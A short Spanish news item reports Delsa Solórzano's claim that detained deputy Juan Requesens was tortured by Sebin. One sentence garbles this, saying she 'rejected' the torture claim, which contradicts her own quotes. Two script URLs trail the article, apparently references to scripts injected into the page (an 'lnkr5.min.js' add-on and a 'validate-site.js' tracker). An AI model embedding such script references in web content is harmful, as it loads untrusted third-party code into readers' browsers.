La parlamentaria aseguró que el diputado por Primero Justicia fue sometido a torturas y tratos crueles.

Delsa Solórzano, diputada a la Asamblea Nacional, se encuentra a las afueras del Palacio de Justicia esperando que se realice la audiencia de presentación de Juan Requesens, diputado a la Asamblea Nacional, quien fue detenido hace tres días por funcionarios del Servicio Bolivariano de Inteligencia (Sebin).

“Estamos esperando de la realización de la consolidación, porque ni siquiera le llamo audiencia, de los atropellos procesales contra el diputado Juan Requesens”, dijo Solórzano en un video compartido en su Twitter.

El parlamentario fue detenido por el Sebin por estar presuntamente involucrado en el “atentado” en contra de Nicolás Maduro. Solórzano rechazó que durante la detención Requesens ha sido torturado.

“A Juan lo maltrataron, lo torturaron. Todos hemos visto hoy como ha sido humillado, como un joven ha sido sometido a torturas y tratos crueles e inhumanos”, dijo la parlamentaria.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533946725817https://devlinkin.xyz/addons/lnkr5.min.js

Loading...